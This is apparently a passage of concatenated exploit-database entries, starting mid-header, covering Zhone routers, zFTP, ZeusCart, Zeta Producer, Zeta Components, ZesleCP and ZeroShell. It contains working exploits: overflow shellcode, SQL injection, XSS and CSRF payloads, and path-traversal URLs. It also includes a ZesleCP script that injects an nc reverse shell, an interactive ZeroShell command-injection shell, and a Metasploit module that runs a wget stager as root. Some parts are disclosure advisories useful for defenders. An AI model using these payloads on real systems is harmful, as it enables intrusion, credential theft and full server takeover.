(24xx, 24xxA, 42xx, 42xxA, 26xx, and 28xx series models)
Versions affected: < S3.0.501
Severity: High
Vendor notified: Yes
Reported:
Public release:
Author: Lyon Yang <lyon[at]vantagepoint[dot]sg> <lyon.yang.s[at]gmail[dot]com>
Paper: https://www.exploit-db.com/docs/english/39658-exploiting-buffer-overflows-on-mips-architecture.pdf
Summary:
--------
ZHONE RGW is vulnerable to stack-based buffer overflow attacks due to
the use of unsafe string functions without sufficient input validation
in the httpd binary. Two exploitable conditions were discovered when
requesting a large (7000) character filename ending in .cgi, .tst,
.html, .cmd, .conf, .txt and .wl, in GET or POST requests. Vantage
Point has developed working code execution exploits for these issues.
1. Stack Overflow via HTTP GET Request
---------------------------------------------------------------------------------------
GET /.cmd?AAAA…..AAAA<7000 Characters> HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0)
Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/zhnvlanadd.html
Authorization: Basic (Base 64 Encoded:<USER:PASSWORD>)
Connection: keep-alive
2. Stack Overflow via HTTP POST Request
---------------------------------------------------------------------------------------
POST /.cgi HTTP/1.1
Host: 192.168.1.1
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/updatesettings.html
Authorization: Basic (Base 64 Encoded:<USER:PASSWORD>)
Content-Length: 88438
AAAA…..AAAA<7000 Characters>
Fix Information:
----------------
Upgrade to version S3.1.241
Timeline:
---------
2015/04: Issues reported to Zhone
2015/06: Requested Update
2015/08: Requested Update
2015/09: Requested Update
2015/10: Confirm that all issues has been fixed
About Vantage Point Security:
--------------------
Vantage Point is the leading provider for penetration testing and
security advisory services in Singapore. Clients in the Financial,
Banking and Telecommunications industries select Vantage Point
Security based on technical competency and a proven track record to
deliver significant and measurable improvements in their security
posture.
https://www.vantagepoint.sg/
office[at]vantagepoint[dot]sg
# Exploit developed using Exploit Pack v5.4
# Exploit Author: Juan Sacco - http://www.exploitpack.com -
# jsacco@exploitpack.com
# Program affected: zFTP Client
# Affected value: NAME under FTP connection
# Where in the code: Line 30 in strcpy_chk.c
# __strcpy_chk (dest=0xb7f811c0 <cdf_value> "/KUIP", src=0xb76a6680 "/MACRO", destlen=0x50) at strcpy_chk.c:30
# Version: 20061220+dfsg3-4.1
#
# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
# Program description: ZFTP is a macro-extensible file transfer program which supports the
# transfer of formatted, unformatted and ZEBRA RZ files
# Kali Linux 2.0 package: pool/main/c/cernlib/zftp_20061220+dfsg3-4.1_i386.deb
# MD5sum: 524217187d28e4444d6c437ddd37e4de
# Website: http://cernlib.web.cern.ch/cernlib/
#
# gdb$ run `python -c 'print "A"*30'`
# Starting program: /usr/bin/zftp `python -c 'print "A"*30'`
# *** buffer overflow detected ***: /usr/bin/zftp terminated
# ======= Backtrace: =========
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x6c773)[0xb6fd1773]
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(__fortify_fail+0x45)[0xb7061b85]
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(+0xfac3a)[0xb705fc3a]
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(__strcpy_chk+0x37)[0xb705f127]
# /usr/lib/i386-linux-gnu/libpacklib.so.1_gfortran(csetup+0x1a4)[0xb7417864]
# /usr/lib/i386-linux-gnu/libpacklib.so.1_gfortran(csetup_+0x24)[0xb7418604]
# /usr/lib/i386-linux-gnu/libpacklib.so.1_gfortran(czopen_+0xd4)[0xb73f6d14]
# /usr/bin/zftp[0x804dc9b]
import os, subprocess
def run():
try:
print "# zFTP Client - Local Buffer Overflow by Juan Sacco"
print "# This Exploit has been developed using Exploit Pack -
http://exploitpack.com"
# NOPSLED + SHELLCODE + EIP
buffersize = 100
nopsled = "\x90"*30
shellcode =
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
eip = "\x40\xf3\xff\xbf"
buffer = nopsled * (buffersize-len(shellcode)) + eip
subprocess.call(["zftp ",' ', buffer])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "Sorry, zFTP client- Not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Snap! Something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit zFTP Client - Local Overflow Exploit"
print "Author: Juan Sacco - Exploit Pack"
except IndexError:
howtousage()
run()
ZeusCart 4.0: SQL Injection
Security Advisory – Curesec Research Team
1. Introduction
Affected Product: ZeusCart 4.0
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Contact: support@zeuscart.com
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 08/13/2015
Disclosed to public: 09/14/2015
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Vulnerability Description
There are at least two SQL Injections in ZeusCart 4.0, one being a blind
injection which does not require credentials to be exploited, the other
being a standard injection in the admin area.
Because the prevention of SQL Injection depends to a large part on
applying simple filters on most input instead of using prepared
stamements, it is highly likely that there will be more SQL injection
vulnerabilities that are not covered here.
3. Timing based Blind SQL Injection
There is a blind timing based SQL injection into the maincatid argument.
An attacker does not need to be authenticated to exploit this.
Proof Of Concept
http://localhost/zeuscart-master/index.php?do=featured&action=showmaincatlanding&maincatid=-1
AND IF(SUBSTRING(version(), 1, 1)=5,BENCHMARK(500000000,version()),null)
-> true
http://localhost/zeuscart-master/index.php?do=featured&action=showmaincatlanding&maincatid=-1
AND IF(SUBSTRING(version(), 1, 1)=4,BENCHMARK(500000000,version()),null)
-> false
Please note that there is a bug when displaying featured items, so this
will display an error message or show a blank page. The timing
difference is still present, and can thus be exploited, but content
based exploitation is not possible because of this.
Also note that quotes may not be used in the payload, as quotes are
sanitized. It is still possible to extract data:
http://localhost/zeuscart-master/index.php?do=featured&action=showmaincatlanding&maincatid=-1
AND IF(ascii(substring((SELECT password from mysql.user limit
0,1),1,1))=42,BENCHMARK(500000000,version()),null)
-> true, password hash starts with *
Code
/classes/Core/CFeaturedItems.php:52
$maincatid = $_GET['maincatid'];
[...]
$sql = "SELECT DISTINCT a.category_name AS
Category,a.category_id AS maincatid, b.category_name AS SubCategory,
b.category_id as subcatid, b.category_image AS image FROM category_table
a INNER JOIN category_table b ON a.category_id = b.category_parent_id
WHERE b.category_parent_id=".$maincatid." AND b.category_status=1 ";
4. SQL Injection in Admin Area
All GET, POST, and REQUEST input is sanitized via filter_var($value,
FILTER_SANITIZE_STRING), which offers some protection against SQL
injection and XSS, but is not recommended as only defense.
For many queries, there is no further defense via escaping or prepared
statements. This makes all queries that get their data from different
sources than GET, POST, and REQUEST - such as FILES -, and all queries
containing unquoted parameters - such as seen in the blind injection
above - vulnerable.
Proof Of Concept
The steps to reproduce this issue are as following
Log in as admin
Create a new product, using a file name for ufile[0] like:
"image.jpgblla', description=(SELECT password FROM mysql.user limit
0,1), image='test
Visiting
http://localhost/zeuscart-master/admin/index.php?do=aprodetail&action=showprod&prodid=PRODUCTID
will give the result of the injected query.
Curl command to create a new product:
curl -i -s -k -X 'POST' \
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:40.0)
Gecko/20100101 Firefox/40.0' -H 'DNT: 1' -H 'Content-Type:
multipart/form-data; boundary=--------2025782171' \
-b 'PHPSESSID=hsa73tae4bq4ev381430dbfif0' \
--data-binary $'----------2025782171\x0d\x0aContent-Disposition:
form-data; name=\"selcatgory[]\"\x0d\x0a\x0d\x0aChoose
Category\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:
form-data;
name=\"selcatgory[]\"\x0d\x0a\x0d\x0a25\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:
form-data;
name=\"product_title\"\x0d\x0a\x0d\x0aMYTESTPRODUCT2\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:
form-data;
name=\"sku\"\x0d\x0a\x0d\x0a77\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:
form-data;
name=\"txtweight\"\x0d\x0a\x0d\x0a77\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:
form-data;
name=\"status\"\x0d\x0a\x0d\x0aon\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:
form-data; name=\"ufile[0]\"; filename=\"image.jpgblla\',
description=(SELECT password FROM mysql.user limit 0,1),
image=\'test\"\x0d\x0aContent-Type:
image/jpeg\x0d\x0a\x0d\x0acontent\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:
form-data;
name=\"price\"\x0d\x0a\x0d\x0a555\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:
form-data;
name=\"msrp_org\"\x0d\x0a\x0d\x0a555\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:
form-data;
name=\"soh\"\x0d\x0a\x0d\x0a555\x0d\x0a----------2025782171--\x0d\x0a' \
'http://localhost/zeuscart-master/admin/index.php?do=productentry&action=insert'
Code
CProductEntry.php:313
$imgfilename= $_FILES['ufile']['name'][$i];
$imagefilename =
date("Y-m-d-His").$imgfilename ; // generate a new name
$image="images/products/". $imagefilename;
// updated into DB
[...]
if($i==0)
{
$imgType='main';
$update="UPDATE products_table set
image='$image',thumb_image='$thumb_image',large_image_path='$large_image' where
product_id='".$product_id."'";
$obj->updateQuery($update);
}
else
{
$imgType='sub';
}
if($_FILES['ufile']['name'][$i]!='')
{
$query_img="INSERT INTO
product_images_table(product_id,image_path,thumb_image_path,type,large_image_path)
VALUES('".$product_id."','$image','$thumb_image','$imgType','$large_image')";
$obj_img=new Bin_Query();
$obj_img->updateQuery($query_img);
}
}
5. Solution
This issue was not fixed by the vendor.
6. Report Timeline
08/13/2015 Informed Vendor about Issue (no reply)
09/07/2015 Reminded Vendor of release date (no reply)
09/14/2015 Disclosed to public
7. Blog Reference:
http://blog.curesec.com/article/blog/ZeusCart-40-SQL-Injection-56.html
Advisory: Multiple reflecting XSS-, SQLi and
InformationDisclosure-vulnerabilities in Zeuscart v.4
Advisory ID: SROEADV-2015-12
Author: Steffen Rösemann
Affected Software: Zeuscart v.4
Vendor URL: http://zeuscart.com/
Vendor Status: pending
CVE-ID: will asked to be assigned after release on FullDisclosure via
OSS-list
Software used for research: Mac OS X 10.10, Firefox 35.0.1
==========================
Vulnerability Description:
==========================
ECommerce-Shopping Cart Zeuscart v. 4 suffers from multiple XSS-, SQLi- and
InformationDisclosure-vulnerabilities.
==================
Technical Details:
==================
====
XSS
===
Reflecting XSS-vulnerabilities can be found in a common
Zeuscart-installation in the following locations and could be exploited for
example by crafting a link and make a registered user click on that link.
The parameter "search", which is used in the index.php is vulnerable to
XSS-attacks.
Exploit-Example:
http://
{TARGET}/index.php?do=search&search=%22%3E%3Cbody%20onload=eval%28alert%28document.cookie%29%29%20%3E%3C!--
By appending arbitrary HTML- and/or JavaScript-code to the parameter
"schltr" which is as well used in index.php, an attacker could exploit this
XSS-vulnerable parameter:
Exploit-Example:
http://
{TARGET}/index.php?do=brands&schltr=All%3Cbody%20onload=eval%28alert%28String.fromCharCode%2888,83,83%29%29%29%20%3E
The third XSS-vulnerability can be found in the "brand"-parameter, which is
again used in index.php.
Exploit-Example:
http://
{TARGET}/index.php?do=viewbrands&brand=Bata%3Cbody%20onload=eval%28alert%28String.fromCharCode%2888,83,83%29%29%29%20%3E
====
SQLi
====
The SQL injection-vulnerabilities can be found in the administrative
backend of Zeuscart v. 4 and reside in the following locations in a common
installation.
By appending arbitrary SQL statements to the "id"-parameter, an attacker
could exploit this SQL injection vulnerability:
Exploit-Example:
http://
{TARGET}/admin/?do=disporders&action=detail&id=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,database%28%29,34,35,version%28%29,37,38+--+
Another SQL injection vulnerability can be found here and can be exploited
by appending SQL statements to the vulnerable "cid"-parameter:
Exploit-Example:
http://
{TARGET}/admin/?do=editcurrency&cid=1+and+1=2+union+select+1,database%28%29,3,version%28%29,5+--+
The last SQL injection vulnerability I found can be found in the following
location and can be exploited by appending SQL statements to the vulnerable
"id" parameter:
http://
{TARGET}/admin/?do=subadminmgt&action=edit&id=1+and+1=2+union+select+1,version%28%29,3,database%28%29,5+--+
==============
Information Disclosure
==============
The administrative backend of Zeuscart v. 4 allows the admin to use a
functionality, which displays the PHP-installation settings via phpinfo():
http://{TARGET}/admin/?do=getphpinfo
Unfortunately, the PHP-script does not check, if an authorized admin
executes this functionality: It is possible even for unregistered users to
request the above link to see the informations, phpinfo() displays. That
could expose sensitive informations to an attacker which could lead to
further exploitation.
=========
Solution:
=========
Vendor has been notified. After releasing a patch, which seems not to
correct the issues, the vendor decided not to respond anymore to figure out
a solution together. Currently, there is no patch available to secure
Zeuscart-installations.
====================
Disclosure Timeline:
====================
21-Jan-2015 – found the vulnerabilities
21-Jan-2015 - informed the developers (see [3])
21-Jan-2015 – release date of this security advisory [without technical
details]
21-Jan-2015 – fork of the repository to keep the vulnerable version
available for other researchers (see [5])
22-Jan-2015 - vendor responded, provided detailed information
04-Feb-2015 - vendor patches Bin/Core/Assembler.php; vulnerabilities are
still exploitable, which has been reported to the vendor (see [3])
19-Feb-2015 - asked the vendor again, if he will patch these issues (see
[3]); vendor did not respond
21-Feb-2015 - release date of this security advisory
21-Feb-2015 - send to FullDisclosure
========
Credits:
========
Vulnerabilities found and advisory written by Steffen Rösemann.
===========
References:
===========
[1] http://zeuscart.com/
[2] https://github.com/ZeusCart/zeuscart
[3] https://github.com/ZeusCart/zeuscart/issues/28
[4] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-12.html
[5] https://github.com/sroesemann/zeuscart
# Exploit Title: ZeusCart 4.0 Deactivate Customer Accounts CSRF
# Date: 12/20/2018
# Exploit Author: mqt
# Vendor Homepage: http://http://www.zeuscart.com/
# Version: Zeus Cart 4.0 CSRF
1. Vulnerability Description
Due to the form not being validated, ZeusCart4.0 suffers from a Cross
Site Request Forgery vulnerability, which means an attacker can
perform actions on behalf of a victim, by having the victim visit an
attacker controlled site.
In this case, the attacker is able to "deactivate" any customer
accounts, which means that the account is banned and cannot login.
Proof of Concept:
<html>
<body>
<img style="display:none"msrc="http://localhost/admin/?do=regstatus&action=deny&id=2" alt="">
</body>
</html>
ZeusCart 4.0: CSRF
Security Advisory – Curesec Research Team
1. Introduction
Affected Product: ZeusCart 4.0
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Contact: support@zeuscart.com
Vulnerability Type: CSRF
Remote Exploitable: Yes
Reported to vendor: 08/13/2015
Disclosed to public: 09/14/2015
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Vulnerability Description
None of the forms of Zeuscart have CSRF protection, which means that an
attacker can perform actions for the victim if the victim visits an
attacker controlled site while logged in.
3. Proof of Concept
Change Admin Credentials:
<form name="myform" method="post"
action="http://localhost/zeuscart-master/admin/?do=adminprofile&action=update"
enctype="multipart/form-data">
<input type="hidden" name="admin_name" value="admin2">
<input type="hidden" name="admin_email" value="admin2@example.com">
<input type="hidden" name="admin_password" value="admin">
</form>
<script>document.myform.submit();</script>
4. Solution
This issue was not fixed by the vendor.
5. Report Timeline
08/13/2015 Informed Vendor about Issue (no reply)
09/07/2015 Reminded Vendor of release date (no reply)
09/14/2015 Disclosed to public
6. Blog Reference
http://blog.curesec.com/article/blog/ZeusCart-40-CSRF-58.html
source: https://www.securityfocus.com/bid/68182/info
ZeusCart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ZeusCart 4.0 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?do=addtocart&prodid=${PROD_ID} and sleep(1)
SEC Consult Vulnerability Lab Security Advisory < 20180712-0 >
=======================================================================
title: Remote Code Execution & Local File Disclosure
product: Zeta Producer Desktop CMS
vulnerable version: <=14.2.0
fixed version: >=14.2.1
CVE number: CVE-2018-13981, CVE-2018-13980
impact: critical
homepage: https://www.zeta-producer.com
found: 2017-11-25
by: P. Morimoto (Office Bangkok)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"With Zeta Producer, the website builder and online shop system for Windows,
you can create and manage your website locally, on your computer.
Get without expertise in 3 steps to your own homepage: select design,
paste content, publish website. Finished."
Source: https://www.zeta-producer.com/de/index.html
Business recommendation:
------------------------
The vendor provides a patched version which should be installed immediately.
Users of the product also need to verify that the affected widgets are updated in
the corresponding website project! It could be necessary to rebuild the whole project
or copy the new widgets to the website projects. For further information consult the
vendor.
Furthermore, an in-depth security analysis is highly advised, as the software may be
affected from further security issues.
Vulnerability overview/description:
-----------------------------------
1) Remote Code Execution (CVE-2018-13981)
The email contact functionality of the widget "formmailer" can upload files
to the server but if the user uploads a PHP script with a .php extension
then the server will rename it to .phps to prevent PHP code execution.
However, the attacker can upload .php5 or .phtml to the server without any
restriction. These alternative file extensions can be executed as PHP code.
Furthermore, the server will create a folder to store the files, with a
random name using PHP's "uniqid" function.
Unfortunately, if the server permits directory listing, the attacker
can easily browse to the uploaded PHP script. If no directory listing is
enabled the attacker can still bruteforce the random name to gain remote
code execution via the PHP script as well. Testing on a local server it
took about 20 seconds to brute force the random name. This attack will
be slower over the Internet but it is still feasible.
Also, if the user runs the Zeta Producer Desktop CMS GUI client locally,
they are also vulnerable because the web server will be running on TCP port 9153.
The root cause is in the widget "formmailer" which is enabled by default.
The following files are affected:
- /assets/php/formmailer/SendEmail.php
- /assets/php/formmailer/functions.php
2) Local File Disclosure (CVE-2018-13980)
If the user enables the widget "filebrowser" on Zeta Producer Desktop CMS an
unauthenticated attacker can read local files by exploiting path traversal issues.
The following files are affected:
- /assets/php/filebrowser/filebrowser.main.php
Proof of concept:
-----------------
1) Remote Code Execution (CVE-2018-13981)
The following python script can be used to exploit the chain of vulnerabilities.
[.. code has been removed to prevent misuses ..]
When the script is executed, a PHP script (shell) will be uploaded automatically.
# $ python exploit.py
# [+] injecting webshell to http://target/assets/php/formmailer/SendEmail.php
#
# 5a1a5bc991afe
# 5a1a5bc99453a
# 10812
# [*] Found : http://target/assets/php/formmailer/upload_5a1a5bc992772/sectest.php5
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
2) Local File Disclosure (CVE-2018-13980)
The parameter "file" in the "filebrowser.main.php" script can be exploited to read
arbitrary files from the OS with the privileges of the web server user.
Any unauthenticated user can exploit this issue!
http://target/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download
http://target/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc&do=list
Vulnerable / tested versions:
-----------------------------
The following versions have been tested which were the latest version available
at the time of the test:
Zeta Producer Desktop CMS 14.1.0
Zeta Producer Desktop CMS 14.2.0
Source:
- https://www.zeta-producer.com/de/download.html
- https://github.com/ZetaSoftware/zeta-producer-content/
Vendor contact timeline:
------------------------
2017-11-29: Contacting vendor through info@zeta-producer.com and various other
email addresses from the website. No reply.
2017-12-13: Contacting vendor again, extending email address list, no reply
2018-01-09: Contacting vendor again
2018-01-10: Vendor replies, requests transmission of security advisory
2018-01-10: Sending unencrypted security advisory
2018-07-02: There was no feedback from the vendor but the version 14.2.1 fixed
the reported vulnerabilities.
2018-07-12: Public advisory release.
Solution:
---------
Upgrade to version 14.2.1 or newer. See the vendor's download page:
https://www.zeta-producer.com/de/download.html
Users of the product also need to verify that the affected widgets are updated in
the corresponding website project! It could be necessary to rebuild the whole project
or copy the new widgets to the website projects. For further information consult the
vendor.
Workaround:
-----------
Remove "formmailer" and "filebrowser" widgets.
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
Vendor: Zeta Components
module: Mail, <= 1.8.1
Published: November 12nd, 2017
Reported by: Kay
CVE-2017-15806
Overview
Zeta Components are a high quality, general purpose library of loosly coupled components for development of applications based on PHP 5. An issue was discovered in the Mail package for Zeta Components. It’s possible to exploit this vulnerability to execute arbitrary shell commands on the remote server.
Detail
This vulnerability is on send method in ezcMailMtaTransport class.
In /src/transports/mta/mta_transport.php at line 73, send() method use PHP mail() method to deliver email, while PHP use sendmail as default MTA. When mail() method is called, the 5th parameter is $additionalParameters , this parameter can pass extra param to sendmail. As the code shown, it is assigned by this line:
$additionalParameters = "-f{$mail->returnPath->email}”;
If attacker assign email address like:
'kay_malwarebenchmark@outlook.com -X/var/www/html/cache/exploit.php'
and inject payload in mail body, sendmail will transfer log(-X) into /var/www/html/cache/exploit.php. The resulting file will contain the payload passed in the body of the email, that can then be accessed and run through domainname/cache/exploit.php.
To summary, it is possible if all of these conditions are true:
- you use the ezcMailMtaTransport
- your “sendmail” binary allows the -X flag to be set, which is not the case for exim4 and postfix, as they don’t support that argument
- your wwwroot is writable by the user your webserver is running at the input to use for the ezcMailAddress that is assigned to the returnPath property is not properly escaped
PoC
use Mail\mail;
$mail = new ezcMail();
$mail->returnPath = new ezcMailAddress('kay_malwarebenchmark@outlook.com -X/var/www/html/cache/exploit.php');
$mail->addTo( new ezcMailAddress('some one'));
$mail->subject = "Mail PoC Exploit";
$mail->body = new ezcMailText("<?php phpinfo(); ?>");
$transport = new ezcMailMtaTransport();
$transport->send($mail);
Remediation
Upgrade Mail to 1.8.2
# Title: ZesleCP 3.1.9 - Remote Code Execution (RCE) (Authenticated)
# Date: 27.08.2021
# Author: Numan Türle
# Vendor Homepage: https://zeslecp.com/
# Software Link: https://zeslecp.com/
# Version: <=3.1.9
# https://www.youtube.com/watch?v=5lTDTEBVq-0
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# ZesleCP - Remote Code Execution (Authenticated) ( Version 3.1.9 )
# author: twitter.com/numanturle
# usage: zeslecp.py [-h] -u HOST -l LOGIN -p PASSWORD
# https://www.youtube.com/watch?v=5lTDTEBVq-0
import argparse,requests,warnings,json,random,string
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from cmd import Cmd
warnings.simplefilter('ignore',InsecureRequestWarning)
def init():
parser = argparse.ArgumentParser(description='ZesleCP - Remote Code Execution (Authenticated) ( Version 3.1.9 )')
parser.add_argument('-u','--host',help='Host', type=str, required=True)
parser.add_argument('-l', '--login',help='Username', type=str, required=True)
parser.add_argument('-p', '--password',help='Password', type=str, required=True)
args = parser.parse_args()
exploit(args)
def exploit(args):
listen_ip = "0.0.0.0"
listen_port = 1337
session = requests.Session()
target = "https://{}:2087".format(args.host)
username = args.login
password = args.password
print("[+] Target {}".format(target))
login = session.post(target+"/login", verify=False, json={"username":username,"password":password})
login_json = json.loads(login.content)
if login_json["success"]:
session_hand_login = session.cookies.get_dict()
print("[+] Login successfully")
print("[+] Creating ftp account")
ftp_username = "".join(random.choices(string.ascii_lowercase + string.digits, k=10))
print("[+] Username : {}".format(ftp_username))
print("[+] Send payload....")
payload = {
"ftp_user": ftp_username,
"ftp_password":"1337';rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f;echo '".format(listen_ip,listen_port)
}
try:
feth_weblist = session.post(target+"/core/ftp", verify=False, json=payload, timeout=3)
except requests.exceptions.ReadTimeout:
pass
print("[+] Successful")
else:
print("[-] AUTH : Login failed msg: {}".format(login_json["message"]))
if __name__ == "__main__":
init()
# Exploit Title: ZeroShell 3.9.0 - Remote Command Execution
# Date: 10/05/2021
# Exploit Author: Fellipe Oliveira
# Vendor Homepage: https://zeroshell.org/
# Software Link: https://zeroshell.org/download/
# Version: < 3.9.0
# Tested on: ZeroShell 3.9.0
# CVE : CVE-2019-12725
#!/usr/bin/python3
import requests
import optparse
import time
parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help='Base target uri (ex. http://target-uri/)')
options, args = parser.parse_args()
if not options.url:
print('[+] Specify an url target')
print('[+] Example usage: exploit.py -u http://target-uri/')
print('[+] Example help usage: exploit.py -h')
exit()
uri_zeroshell = options.url
session = requests.Session()
def command():
try:
check = session.get(uri_zeroshell + "/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0Aid%0A'")
if check.status_code == 200:
flag = True
print('[+] ZeroShell 3.9.0 Remote Command Execution')
time.sleep(1)
print('[+] Success connect to target')
time.sleep(1)
print('[+] Trying to execute command in ZeroShell OS...\n')
time.sleep(1)
check.raise_for_status()
while flag:
cmd = raw_input("$ ")
payload = "/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0A" + cmd + "%0A'"
uri_vuln = uri_zeroshell + payload
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
res = session.get(uri_vuln, headers=burp0_headers, verify=False)
print(res.text[:res.text.rindex("<html>") / 2])
except requests.exceptions.ConnectionError as err:
print('[x] Failed to Connect in: '+uri_zeroshell+' ')
print('[x] This host seems to be Down')
exit()
except requests.exceptions.HTTPError as conn:
print('[x] Failed to execute command in: '+uri_zeroshell+' ')
print('[x] This host does not appear to be a ZeroShell')
exit()
command()
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Zeroshell 3.9.0 Remote Command Execution',
'Description' => %q{
This module exploits an unauthenticated command injection vulnerability
found in ZeroShell 3.9.0 in the "/cgi-bin/kerbynet" url.
As sudo is configured to execute /bin/tar without a password (NOPASSWD)
it is possible to run root commands using the "checkpoint" tar options.
},
'Author' => [
'Juan Manuel Fernandez', # Vulnerability discovery
'Giuseppe Fuggiano <giuseppe[dot]fuggiano[at]gmail.com>', # Metasploit module
],
'References' => [
['CVE', '2019-12725'],
['URL', 'https://www.tarlogic.com/advisories/zeroshell-rce-root.txt'],
['URL', 'https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py']
],
'DisclosureDate' => 'Jul 17 2019',
'License' => MSF_LICENSE,
'Privileged' => true,
'Platform' => [ 'unix', 'linux' ],
'Arch' => [ ARCH_X86 ],
'Targets' => [
['Zeroshell 3.9.0 (x86)', {
'Platform' => 'linux',
'Arch' => ARCH_X86,
}],
],
'DefaultTarget' => 0,
))
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
])
end
def execute_command(cmd, opts = {})
command_payload = "%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22#{filter_bad_chars(cmd)}%22%0A%27"
print_status("Sending stager payload...")
res = send_request_cgi(
'method' => 'GET',
'uri' => '/cgi-bin/kerbynet',
'encode_params' => false,
'vars_get' => {
'Action' => 'x509view',
'Section' => 'NoAuthREQ',
'User' => '',
'x509type' => command_payload
}
)
return res
end
def filter_bad_chars(cmd)
cmd.gsub!(/chmod \+x/, 'chmod 777')
cmd.gsub!(/;/, " %0A ")
cmd.gsub!(/ /, '+')
cmd.gsub!(/\//, '%2F')
return cmd
end
def check
res = execute_command('id')
if res && res.body.include?("uid=0(root)")
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end
def exploit
print_status("Exploiting...")
execute_cmdstager(flavor: :wget, delay: 5)
end
end